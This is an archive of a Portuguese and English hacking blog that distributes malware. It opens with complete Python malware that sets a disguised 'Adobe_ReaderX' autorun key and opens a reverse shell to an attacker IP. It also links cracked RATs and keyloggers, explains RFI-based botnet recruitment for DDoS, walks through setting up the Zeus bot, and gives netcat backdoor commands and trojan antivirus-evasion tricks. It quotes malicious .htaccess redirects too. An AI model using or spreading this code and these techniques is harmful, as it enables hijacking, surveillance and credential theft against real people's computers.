http://skamason.com/7b9R

http://skamason.com/7b9R
Mostrando postagens com marcador Malware. Mostrar todas as postagens
Mostrando postagens com marcador Malware. Mostrar todas as postagens

sábado, 5 de setembro de 2015

0xC Python Tutorial: Python Malware

Malware


This tutorial demonstrates some proof of concepts for creating malware using Python and PyInstaller.  In a previous tutorial we demonstrated how to compile a Python script as a Portable Executable(PE) using PyInstaller.  Now lets demonstrate some quick proof of concept code to do some malicious actions on a Windows host.
Coding the Malware:
One of the most common things you’ll find with malware is it wanting to gain persistence on the victim.  There are loads of ways to achieve persistence on Windows, one of the more common being to modify the following registry key: “Software\Microsoft\Windows\CurrentVersion\Run”.  Below is a quick screenshot of the Python code to copy the program to the %TEMP% directory and then make a registry modification so this code will execute when a user logs into the computer:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import sys, base64, os, socket, subprocess
from _winreg import *
def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
    os.system('copy %s %s'%(fileName, tempdir))
# Queries Windows registry for key values
# Appends autorun key to runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey =[]
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass
# Set autorun key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
            SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass
Now that we have copied this file over to the %TEMP% directory, and setup persistence we can execute the next portion of the code, the reverse shell.  I leveraged a Python reverse shell released by TrustedSec and made one modification — Base64 encode the network traffic:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def shell():
#Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()
def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()
if __name__ == "__main__":
        main()
Now when this program executes it will open up a reverse shell back to the “attacker” which in this case is a hard coded IP in the script, but it could easily be domain, or maybe something in the Amazon cloud.  Below is a quick screen shot demonstrating the program executing on a Windows host and connecting back to the attacker.  You can notice the network traffic is base64 encoded:
malware
Here is the full code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import sys, base64, os, socket, subprocess
from _winreg import *
def autorun(tempdir, fileName, run):
# Copy executable to %TEMP%:
    os.system('copy %s %s'%(fileName, tempdir))
# Queries Windows registry for the autorun key value
# Stores the key values in runkey array
    key = OpenKey(HKEY_LOCAL_MACHINE, run)
    runkey =[]
    try:
        i = 0
        while True:
            subkey = EnumValue(key, i)
            runkey.append(subkey[0])
            i += 1
    except WindowsError:
        pass
# If the autorun key "Adobe ReaderX" isn't set this will set the key:
    if 'Adobe ReaderX' not in runkey:
        try:
            key= OpenKey(HKEY_LOCAL_MACHINE, run,0,KEY_ALL_ACCESS)
            SetValueEx(key ,'Adobe_ReaderX',0,REG_SZ,r"%TEMP%\mw.exe")
            key.Close()
        except WindowsError:
            pass
def shell():
#Base64 encoded reverse shell
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.56.1', int(443)))
    s.send('[*] Connection Established!')
    while 1:
        data = s.recv(1024)
        if data == "quit": break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        stdout_value = proc.stdout.read() + proc.stderr.read()
        encoded = base64.b64encode(stdout_value)
        s.send(encoded)
        #s.send(stdout_value)
    s.close()
def main():
    tempdir = '%TEMP%'
    fileName = sys.argv[0]
    run = "Software\Microsoft\Windows\CurrentVersion\Run"
    autorun(tempdir, fileName, run)
    shell()
if __name__ == "__main__":
        main()

sábado, 15 de junho de 2013

RainyLogger + Builder ! DOWNLOAD IT HERE

Athena v1.8.3 iRC Bot

Athena v1.8.3 iRC Bot [CRACKED]

What's changed :

- Removed "integrity checking" (most of them afaik)
- Removed that Shit Black Window when launched
- Bin Sized Reduced (bin is 148Kb instead of 203Kb - PE Rebuilt)
- Host Up to 40 Chars
- Channel Up to 20 Chars
- vHost Up to 20 Chars

DOWNLOAD BUILDER HERE

sexta-feira, 3 de maio de 2013

Darkcomet Rat v5.31 (final Version)

SE USAR DarkComet no VMWare NAT MAS NÃO USE BRIDGE nas configurações de rede
finallythe codificador v5 é que depois de um trabalho longo e difícil, eu recodificar muitas parte do programa mostely o multithreading ele também mudar um pouco a GUI principal e todo o gerenciador de arquivos.
ela é mais rápida e mais favorável.












 

quarta-feira, 13 de março de 2013

Blackshades 5.0 Cracked

Webcam Manager - recodificado um pouco de o gerente da webcam para melhorar a qualidade e velocidade. Você também deve observar que agora você é capaz de redimensionar a janela, permitindo-lhe uma imagem mais clara em certos scenarions


Captura de tela - recodificado uma parte para melhorar a velocidade e qualidade


Estabilidade Geral - Geral estabilidade do servidor foi melhorada para causar menos aleatório desconecta, e em geral melhorar sua conexão com seus clientes


Recursos substituídos - Características que são baseados em versões antigas de programas foram removidos para a atualização. Você deve achar que todos os recursos são precisos para programas dias atuais. Isso está nos dando mais espaço para melhorar as características atuais e desenvolver novos.


domingo, 10 de fevereiro de 2013

Botnet Setup



Botnet configuração

    
Neste tutorial, vou apresentar como construir uma botnet.
    
Mas eu tenho certeza que alguns de você aprendeu sobre botnets e eu não vou em detalhes.


    
Existem dois tipos principais de botnet.
    
1. Exe baseado botnet.
    
2. Http baseada botnet.

    
1.Qual é uma botnet Exe base.??

    
Como u já sabe, com base botnet exe é muito popular na comunidade de hackers.
    
Existem códigos de fonte de tantos para os botnets exe base.
    
Eles precisam para compilar e criar um exe.
    
(Isso exe é um cliente e quando a vítima executar isso, a sua máquina ou seu pc vai entrar em um canal do servidor de IRC)
    
Depois de criar um exe, embalá-lo, ligá-lo e difundi-lo na rede.
    
Você pode espalhá-lo por muitas maneiras.
    
Vou postar o exe baseado tutoriais em vídeo por botnet relógio guarda de segurança de rede mais tarde.
    
Em resumo, bots exe base são usados ​​principalmente para máquinas Windows.


    
2.Qual é uma botnet Http baseado??


    
Bots HTTP baseado são principalmente bot bot php e perl.
    
Nenhum deles são bots exe.
    
Eles são utilizados em conjunto com os ataques de RFI ou SQLI.
    
Quando um site é backdoored com uma concha.
    
O atacante carregar um php e executá-lo.
    
Se assim for, o site hackeado se juntar ao servidor de IRC e que atuam site como um zumbi.
    
Vou mostrar um exemplo.

    
http://www.target.com/vul.php?hack_r...com/bot.txt??
    
É o mesmo método com exploit RFI.
    
Quando você injeta o código como acima, www.target.com irá juntar-se ao seu servidor.
    
Então, você precisa encontrar links RFI vulneráveis ​​para obter ou coletar tantos zombies.
    
Mas, com links RFI vulneráveis ​​não é um trabalho difícil.
    
Você pode usar bots RFI scanner e pode obter milhares de ligações RFI.
    
Quando você receber mais de 200 sites, você pode DDoS.
    
Em resumo, http botnet é usado principalmente para servidores web.
    
Ele funciona em Windows Server e Linux.

    
Dica: 200 zumbis de http botnet pode ser mais poderoso do que 200 zumbis de botnet exe.
    
Motivo: O poder da botnet dependem do número de IP ea máquina zumbi.

    
P.S --- você precisará editar o código-fonte do PHP bot.
    
Se alguém aqui tem alguns problemas para construir uma botnet, PM me.

terça-feira, 11 de dezembro de 2012

Spy-NeT RAT 2.7

Posted Image
 
 
https://www.dropbox.com/s/yu40z3szod2mtq0/Spy-NeT%20%5BRAT%5D%202.7.zip

sexta-feira, 16 de novembro de 2012

Ardamax Keylogger 4.0 serial+FULL crack!





Ardamax Keylogger 4,0
Quando não na equipe, que não estão cientes do que ele fez, o software está em execução, você pode aprender todos os sites entrou. O software mantém um arquivo de log para você e atribui um endereço de e-mail como. Se você gostaria de fazer aqui ...


DOWNLOAD IT HERE

segunda-feira, 24 de setembro de 2012

O Que é um Botnet ?


Botnet são programas de computador executados automaticamente e de forma autônoma. Embora o termo "botnet" possa ser usado para se referir a qualquer grupo de bots, geralmente se refere a uma coleção de computadores infectados (chamados de computadores zumbis) executando software de natureza maliciosa, instalados através worms, cavalos de Tróia, ou backdoors, sob um comando e controle das infra-estruturas. A maioria destes computadores estão executando sistemas operacionais Microsoft Windows, mas outros sistemas operacionais podem ser afetados.

Um botnet do originador (também conhecido por "bot herder") pode controlar remotamente o grupo, geralmente através de um meio como o IRC, e geralmente de execráveis fins. Programas individuais que se manifestam como IRC "bots". Muitas vezes o comando-e-controle é realizada através de um servidor de IRC ou um canal específico sobre uma rede pública IRC. Este servidor é conhecido como o "command-and-control server" ("C&C"). Embora raro, mais experientes operadores botnet programa comandando seus próprios protocolos de coçar-se. Os eleitores desses protocolos incluem um servidor de programa, programa cliente para a operação, e que englobam o programa propriamente dito sobre a máquina da vítima (bot). Todos os três destes geralmente comunicar uns com os outros em uma rede, usando um único esquema de cripografia para furtiva ou de detecção e protecção contra a intrusão de rede botnet. 
 
Execução dos Botnets
Execução

Um bot é executado normalmente escondido e está em conformidade com o RFC 1459 (IRC) padrão. Geralmente, o autor de botnet tem comprometido a uma série de sistemas utilizando várias ferramentas (exploits, buffer overflows, assim como outros. Recentes bots automaticamente podem digitalizar seu ambiente e propagar suas próprias vulnerabilidades e usando senhas fracas. Geralmente, as vulnerabilidades mais um robô podem fazer a varredura e se propagam através, ele se torna o mais valioso para um controlador botnet comunidade. O processo de roubar recursos computacionais como resultado de um sistema a ser associado a uma "botnet" é por vezes referido como "scrumping".

Botnets tornaram-se uma parte significativa da internet, embora cada vez mais escondidos. Devido à maioria das convencionais redes IRC e tomando medidas para bloquear o acesso que anteriormente acolheu-botnets, os controladores terão agora de encontrar os seus próprios servidores. Muitas vezes, uma botnet irá incluir uma variedade de conexões, que vão desde dial-up, ADSL e cabo, e uma variedade de tipos de rede, incluindo educacional, corporativa, governamental e mesmo redes militares. Às vezes, um controlador irá esconder um servidor de IRC da instalação em um site corporativo ou educacional em que conexões de alta velocidade podem apoiar um grande número de outros bots.A exploração deste método de usar um bot para sediar outros bots tem proliferado só mais recentemente como script kiddies, não tendo o conhecimento necessário para tirar vantagem dela. 
 
Caso de Polícia
 
Vários botnets foram encontrados e retirados da Internet. A polícia holandesa encontrou um nó de 1,5 milhões de botnets e do ISP norueguês Telenor 10000-dissolveu um nó botnet. Grandes esforços internacionais coordenados para encerrar botnets também foram iniciados. Estima-se que até um quarto de todos os computadores pessoais conectados à internet podem se tornar parte de uma botnet.
 
 

quinta-feira, 20 de setembro de 2012

Optima Botnet v.10 0DAY

Bom, tem um upload de arquivos(qualquer extensao), Entao desenvolvi programa que facilita na exploitação segue o link...

Vou deixar um link da BOTNET upada para demonstração: http://www.simplifiedsuccess.com/blog/BOT/index.php

Print do Upload de arquivos:

 
Scan: https://www.virustotal.com/file/d84379bb837c10b6e5353f138fa628176734a74d765e33ae15de74de679c7b40/analysis/1348167809/

Vlw galera Em Primeira mao ^^

Creditos:
Descoberta: D4RKCR1PT3R
Exploit: D4RKCR1PT3R

sexta-feira, 25 de maio de 2012

Atualize MPGe - um invólucro de msfpayload e msfencode do Metasploit.

MPGe é um invólucro de msfpayload e msfencode do Metasploit. É possível usá-lo com Backtrack e Backbox.This wrapper cria cavalos de tróia para o Microsoft Windows, Linux, Mac OS X Panther, Tiger e Leopard Lion. Para Mac OS X é possível criar um shell reverso clássico ou criar um shell reverso inserido em um pacote. Pkg ou criar arquivos. App. Eu tento o meu programa depois entre duas máquinas virtuais: Primeiro anfitrião Mac Book (preto) e segundo host virtual Windows XP. Antes de eu usar o meu programa entre dois reais Mac OS X: O Livro primeiro Mac (preto) eo segundo Mac iBook G4 PowerPC (branco) com OS Tiger. Estes dois foram Mac conectados à rede local (intranet). Mac OS X Livro (preto) está em ouvir e esperar o shell reverso. O segundo mac osx Mac iBook G4 PowerPC receber um pacote (um pacote de arquivos. Ou. Dmg) e quando o usuário clica no arquivo de inserir uma senha como root e ativar o shell shell.The reversa reversa com script mal é um jogo não necessariamente muito sucesso não se preocupe.
Plataforma: Unix / Linux
Características:
Baixar versão mais recente: Mpge.tgz (17,5 MB)
Encontrar outra versão |
Leia mais aqui: http://sourceforge.net/projects/mpge/

segunda-feira, 21 de maio de 2012

Entendimento. Ataques htaccess

Os atacantes têm vindo a utilizar o arquivo htaccess. Por um tempo. Eles usam esse arquivo para esconder malwares , para redirecionar os motores de busca para seus próprios sites (acho blackhat SEO), e para muitos outros fins (esconder backdoors, injetar o conteúdo, para modificar os valores do php.ini, etc.)
Por que eles usam o arquivo htaccess.? Por várias razões. Primeiro, o htaccess. É um arquivo oculto (começando com um "."), De modo que alguns proprietários do local não poderia encontrá-los em seus clientes de FTP. Em segundo lugar, é um arquivo poderoso que lhe permite fazer várias alterações para o servidor web e comportamento PHP. Isso faz com que a. Htaccess ataque do difíceis de encontrar e de limpar.

1 - Redirecionando usuários provenientes de mecanismos de busca de malwares

Este é o tipo mais simples de htaccess. Ataque, eo que vemos com mais freqüência. Isso é o que é adicionada ao arquivo htaccess de um site hackeado.:

RewriteEngine On
RewriteCond% {HTTP_REFERER}. * Google. * [OR]
RewriteCond% {HTTP_REFERER}. * Perguntar. * [OR]
RewriteCond% {HTTP_REFERER}. * Yahoo. * [OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * [OR]
..
RewriteCond% {HTTP_REFERER}. * Linkedin. * [OR]
RewriteCond% {HTTP_REFERER}. * Flickr *.
RewriteRule ^ (. *) $ Http://villusoftreit.ru/in.cgi?3 [R = 301, L]
Como você pode ver, ele irá verificar a referência de quem visita o site e se o usuário veio de uma pesquisa no Google (ou Yahoo ou Bing ou qualquer motor de busca), ele irá redirecionar o usuário para uma página com malware (neste exemplo http :/ / villusoftreit.ru / in.cgi? 3). Note que se você digitar o site diretamente na barra de endereços do seu navegador, nada vai acontecer. Por quê? Faz mais difícil para o proprietário do site para detectar o ataque, já que eles provavelmente digite o nome do site, e não procurar por ela no Google.
Abaixo é um outro exemplo do mesmo ataque, mas desta vez para redireccionar http://globalpoweringgatheringon.com/in.php?n=30 (um desses domínios Hilary Kneber). Note-se que este tempo, adicionou they'v centenas de branco espaços antes do "RewriteCond" para torná-lo mais difícil de ver em um editor de texto (Nós removemos abaixo para fazer mais fácil de ler no post).
# BEGIN WordPress
RewriteEngine On
RewriteOptions herdar
RewriteCond% {HTTP_REFERER}. * Ask.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite.com * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Search.yahoo * $ [NC]
RewriteRule. * Http://globalpoweringgatheringon.com/in.php?n=30 [R, L]

2 - Redirecionando as páginas de erro a malware

Este é o segundo tipo mais comum de. Malwares htaccess. Ao invés de redirecionar todo o tráfego, os atacantes são apenas modificando as páginas de erro para seus próprios domínios (ainda mais difícil de detectar). Isto é o que aparece no htaccess.:
RewriteEngine On
Http://powercrystal.ru/inject/index.php 400 ErrorDocument
Http://powercrystal.ru/inject/index.php 401 ErrorDocument
ErrorDocument 403 http://powercrystal.ru/inject/index.php
Http://powercrystal.ru/inject/index.php ErrorDocument 404
Http://powercrystal.ru/inject/index.php 500 ErrorDocument
Outros exemplos:
ErrorDocument 400 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 403 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 405 http://arthurlundt.cz.cc/ht_er_docs/
ErrorDocument 404 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 405 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 406 http://bowdencanton.co.cc/ht_er_docs/
ErrorDocument 400 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 403 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 404 http://nicomagen.cz.cc/ht_er_docs/
ErrorDocument 405 http://nicomagen.cz.cc/ht_er_docs/

3 - Anexação de malwares em um site web

Este tipo de ataque está ficando mais comum recentemente. Em vez de fazer o redirecionamento no arquivo htaccess., Eles modificam o valor PHP "auto_append_file" para carregar malware a partir de um local escondido. Por exemplo:
auto_append_file php_value "tmp/13063671977873.php /"
Assim, o conteúdo de / tmp/13063671977873.php fica anexado a cada arquivo PHP. Isto é o que o arquivo PHP é semelhante:
<script src="http://nicomagen.cz.cc/jquery.js"> </ script>
A malwares javascript comum. Eles às vezes até mesmo anexar imagens falsas para tornar ainda mais difícil de detectar.

segunda-feira, 7 de maio de 2012

DataBase BotNet

http://database.th3-0utl4ws.com/index.php?dir=Bots%2F


Avarios BotNet.. Enjoy.......

sábado, 5 de maio de 2012

Tutorial ZeusBot

Tutorial sobre o uso de Zeus Bot















Então, hoje vamos aprender uma outra botnet, o bot ZEUS, Sim, você leu que corrigir! Eu não acho que você não pode ter ouvido falar de Zeus, é um dos bot mais perigoso do mundo.

Mas por que eu estou mostrando isso? Porque eu quero que você aprenda os ataques mais perigosos do mundo, não apenas com algumas ferramentas de hacking como SKR! P7 K! DD! 3s .... Eu quero que você seja um profissional, não um hacker.


Baixe o código fonte + Builder de Zeus Bot A partir daqui

Vamos fazer a prática agora:
Nota: - Para fins de ensino e aprendizagem, não vou ser responsável por seu trabalho shity.

Passo 1: Primeiro de tudo, abrir uma conta em uma hospedagem grátis (ou pago) com suporte ao MySQL.
Passo 2: Agora crie um banco de dados MySQL e copiar os detalhes, você vai precisar deles.
Index.php Extraia os arquivos de ZBOT.rar e abrir "instalar" pasta e aberto: Passo 3


 






Passo 4: Agora, alguns edição, vá para a linha número 154 e editar os detalhes que lhe sejam feitas. ver acima.
Passo 5: Agora global.php goto / cpanel / sistema e aberto e definir os mesmos valores que lá você pode encontrar em linha número 408.
 


 






Passo 6: Nós somos feitos com a instalação, agora config.txt goto / zeus e aberto e definir os detalhes como na imagem:
Passo 7: Abra o builder.exe e clique em "Criar config" você vai ter um arquivo chamado "cfg.bin" e clique em "Loader Build" você vai ter bt.exe (arquivo infectado).
Passo 8: Agora o upload dos arquivos na mesma seqüência em que aparecem no seu PC:
 









Passo 9: Após http://yourhost.com/install/index.php upload, Open, você deve obter uma tela como essa.



 












Passo 10: Preencha os dados e clique em instalar. Agora abra uma nova aba e digite: "yourhost.com / cp.php" e, finalmente, você está pronto para ir.
 









Não usá-lo em qualquer servidor ou sistema que você não possui. É uma ação ilegal.
O mais importante: bot Zeus tem um tracker, que é usado pela maioria das agências de aplicação da lei. Assim eles podem acompanhar você a qualquer momento, em qualquer lugar se você fizer qualquer atividade ilegal.
Fique anônimo. Fique seguro.

segunda-feira, 23 de abril de 2012

NetCat

Olá a Todos Fiquei Algumas Dias Off Pois Estava Viajando Mas Ja Estou De Volta... Um Simples Tutorial Sobre o NetCat Conhecido Como Canivete Suíço  é Um Poderoso Malware Eu Uso Muito Ele.. Mas Não Tive Tempo De Fazer Um Tutor Então Por Isso Copiei La Na invasaohacking.. Mas Qual Quer Duvidas So Mi Perguntar Ok ?

 Vamos dar olhada nos comandos do netcat, a opção -H exibe as opções do . Basta digitar nc -h e dar enter.
Veremos os principais comandos do netcat:
l = Coloca uma em de listenning(escuta)
L = Coloca uma porta em listenning(escuta), reabrindo a porta caso ela feche
P = Define uma porta
V = ativa o recebimento de eco
U = utiliza o protocolo UDP ao invés de TCP
T = para se conectar a TELNET
O = Gera um log em hexadecimal
W = Determina um máximo para aguardar uma reposta
E = Redireciona
D = Coloca o netcat em modo furtivo, ou seja, permanece carregado em memória.


Bem, já conhecemos os comandos mais usados do netcat vamos a pratica:
Colocando uma porta em escuta:
Nc -l -p 8080 isso faria que o netcat colocasse a porta 8080 em escuta, note que foi usado -v para que fosse mostrado a do programa na “listening on [any] 8080 …“, caso a opção -v não fosse inserida este texto não seria mostrado.


Fazendo um Port-Scanner com o netcat:

nc -vv 127.0.0.1 1-6550 isso faz um scanner da porta 1 à 6550 mais você também pode selecionar as portas que deseja escanear dando um espaço entre os de portas a ser escaneados ex: nc -vv 127.0.0.1 21 80 23 79 25 isso faria um scanner nas portas 80, 23, 79 e 25.

Fazendo um trojan com o netcat:

Note que basta redirecionar todo o trafego de uma porta enviando a cmd.exe se for windows e bin/bash.sh se for a sintaxe é a seguinte em windows nc -L -p 1024 -e cmd.exe e nc -l -p 1024 -e bin/sh em UNIX.


Fazendo um de brute force com o netcat:

O canivete suíço do TCP/IP tem muitas funções interessante uma delas é o brute force um exemplo: nc -vv 79 < c:\usuarios.txt > c:\log.txt note que você precisara de um arquivos com nome de usuários em c: e todo log será gravado em c:\log.txt para que você possa depois. esse força foi feita em cima da porta 79 FINGER mais poderia ser facilmente adaptada a outras portas.

Fazendo um sniffer com o netcat:

O fantástico netcat também pode servir como um sniffer e captura todo trafego em uma basta colocar nc -vv -L 127.0.0.1 -p 80 note que o L deve ser maiúsculo pois, esta opção reabre socketes fechados, isso fará com que o netcat capture todo trafego na porta 80 acho que nem é mais necessário dizer que podemos também gravar toda saída em um TXT, mais bem pra você que ainda não sacou a jogada ai vai nc -vv -L 127.0.0.1 -p 80 > c:\sniffer.txt 

 Leia Mais Em: NetCat PDF

 Download: http://www.downloadnetcat.com/ 

Bem Galera é Isso Ae Até Mais...

terça-feira, 28 de fevereiro de 2012

O que é rootkit?

Você sabia que alguns antivírus não detectam rootkits? Sabia, também, que rootkits são um tipo de trojan? Não? Pois então descubra o que este malware pode fazer com o seu computador e fique atento para não cair nas armadilhas desse camaleão dos arquivos. Afinal, nunca se sabe quando algum rootkit vai resolver se camuflar no seu sistema, certo?

Antes de explicar o que os rootkits fazem, é preciso conhecer as origens deste arquivo. Assim, nada melhor do que entender o por quê desse nome. Tudo começou no sistema operacional Linux/ Unix, quando os kits para programas que mantêm acesso irrestrito a sistemas e computadores inteiros. Funciona como um backdoor, ou seja, uma porta em que o usuário (bem ou mal intencionado – na maioria das vezes a intenção é má) pode entrar e sair livremente, fazendo o que bem entender.
“Root” é a denominação usada para os usuários que têm o controle total da máquina. Deste modo, ao juntar “root” e “kit” tem-se o kit que permite controlar de maneira absoluta o computador. A principal característica deste tipo de arquivo é esconder-se nos sistemas operacionais para que esses usuários mal intencionados possam fazer o que quiserem quando bem entenderem. Existem dois tipos bastante frequentes entre os sistemas operacionais Windows e Linux/Unix.
No Windows, normalmente, eles infectam as tarefas e processos de memória, anulando os pedidos do programa que está com esta praga. Isso faz com que o programa não encontre os arquivos necessários para funcionar. Pode-se simplificar dizendo que os rootkits “enganam” o programa, fazendo-o acreditar que o arquivo não está lá, provocando mensagens de erro.

Já no Linux/Unix, o que acontece é um pouco diferente. O rootkit que infectar um sistema deste tipo irá substituir um programa de listagem de arquivos. Uma vez que ele mesmo exiba as listas, o trojan ficará são e salvo, escondido no sistema. Se ninguém descobre que ele está lá, fica fácil para o sujeito de más intenções exercer o direito de ir e vir no seu computador. Entretanto, ninguém quer alguém “indo e vindo” no próprio computador, não é mesmo?

Então o que fazer para eliminar rootkits e evitá-los?
A recomendação é bastante simples, entretanto é preciso entender quais são os ambientes ideais para a “reprodução” e “difusão” de rootkits. Assim como a maioria dos vírus, trojans e várias outras pragas digitais, os rootkits se proliferam em emails e sites maliciosos como aqueles que imitam páginas da Receita Federal e bancos. Clicar em um desses emails pode ser perigoso sob vários aspectos. Além de poder roubar as suas informações pessoais, estes backdoors, rootkits e outros malwares dão acesso a quem souber invadir computadores.

Neste caso, é imprescindível contar com a proteção de um bom antivírus e um firewall. Porém, melhor do que essa combinação, é importante também ter um anti-spam que seja eficiente. Afinal, boa parte dos endereços que enviam estes emails são suspeitíssimos e devem ser denunciados aos serviços anti-spam. Entretanto, se você não tiver algo que bloqueie spams ou redirecione-os para longe da sua caixa de entrada, procure não abrir e-mails de remetentes desconhecidos. Isto pode evitar muitas dores de cabeça.

Alguns antivírus já conseguem detectar a presença de rootkits. Mas ainda não são todos os tipos deste malware que podem ser encontrados. Isto porque quanto maior é a tecnologia para a defesa, também desenvolve-se a maneira de atacar. Por isso, alguns rootkits já atacam de maneira diferenciada, com códigos ainda não descobertos pelos programas de segurança. Os rootkits vão chegar ao seu sistema através de brechas. Assim, é preciso manter o seu Windows sempre atualizado e procurar manter as configurações de segurança ativadas.
Essas pragas possuem diversas funções que não se resumem em apenas liberar o acesso ilimitado ao seu computador. Uma das mais assustadoras delas é o “keylogger”. Esta função permite ao cracker visualizar suas senhas, nomes de usuário e várias informações que são digitadas no computador. Portanto, se você não quer sofrer ataques e muito menos ter informações copiadas, mantenha o seu sistema operacional, antivírus e firewall muito bem atualizados.
Assim, você evita rootkits, vírus e outros tipos de malware que com certeza vão lhe causar uma grande dor de cabeça. E lembre-se, abrir e-mails de desconhecidos não é seguro. Logo, procure ler os emails de quem você conhece e em hipótese alguma confie em mensagens que se dizem “oficiais” do Ministério Público, Receita Federal e bancos. Pode se dizer, com bastante veemência, que quase 90% destes emails são iscas para usuários desavisados!
Agora você não tem mais desculpas para clicar em emails estranhos e não atualizar seu antivírus! Conte para a gente se você já foi alvo de ataques deste tipo! É muito importante compartilhar estas experiências para que as outras pessoas não sejam atacadas também! Portanto, deixe no seu comentário a sua história!

Fique ligado para mais informações sobre segurança e até a próxima!

quinta-feira, 9 de fevereiro de 2012

Usando Bifrosy Com o Anti-Virus Ativado

Bem Primeira Mente o que é o Bifrosy ?

O Bifrost é um programa de computador do tipo trojan de conexão reversa.
Searchtool.svg

Isso significa que ao invés de o atacante ter que se conectar ao IP da vítima, a própria vítima se conecta ao atacante, que normalmente usa um programa de DNS como o NO-IP, o atacante cria um endereço DNS e utiliza o seu endereço DNS como host no trojan server, de modo que quando for executado, o server procura o host na internet, e só vai encontrar se o atacante estiver com o NO-IP ativo, (O DNS resolve um nome para o IP do host), desse modo, o server se conecta a máquina do atacante.


Agora Como Usar o Bifrosy Com o Anti-Virus Ativado ?

Bem Simples
abra o Anti-Virus , configurar ,scaner,verificação, exceção e add o programa , faça o mesmo em guard , essa dica vale pra todos ....

Créditos a //M3N3G@TT1:

sábado, 29 de outubro de 2011

[ Dica ] Engenharia Com o Turkojan

Essa engenharia , serve para quem não consegue passar as dll na descompactação do server ( senha , browser etc...)
Geralmente o turkojan ( mesmo estando indetectável) descompacta uma dll na ativação no pc da vítima , onde o av detecta e exclui , vc até conecta , mas não tem acesso as senhas , pois ele descompacta outra dll ....etc
como resolver isso ?
Seguinte : Crie o server normalmente , não empacotem no upx , abram o server no resource hacker , exclua todas as opções , exceto DENEME E PACKAGEINFO
Em packageinfo , troque o conteúdo , por exemplo , coloque o packageinfo de outro programa pequeno , e salve . ( Não é obrigatório , mas ajuda a deixar indetectavel e diminui o tamanho )
Deixe indetectavel , cada um a sua maneira , use um cripter e um empacotador .
Em uma máquina virtual , instale o server no desktop , observe a dll que será descompactada .
Conecte e busque as senhas , observe que gera outra dll.
Agora , copie essas dual dll , e as deixem indetectável , usem um empacotador , ou cripter .
Agora , ao infectar a vitima , o av vai detectar a dll e excluir , mas vcs teram acesso ao pc , porem com funções limitadas , pois bem , façam o upload das dll editadas para mesma pasta onde está instalado o server e pronto.
Terão acesso as senhas e todas as funções do trojam , uma vez que ele não descompactará a mesma dll já contida na pasta
Caso queiram infectar alguem já infectado com outro trojam, façam primeiro o upload das dll , depois do trojam , pra não levantar suspeita.
espero ter ajudado ...
Ae galera ...caso não consigam visualizar as dll
http://www.4shared.c...http://www.4shared.com/file/E_BIJ2YI/dll_turko.html
Créditos a : //M3N3G@TT1: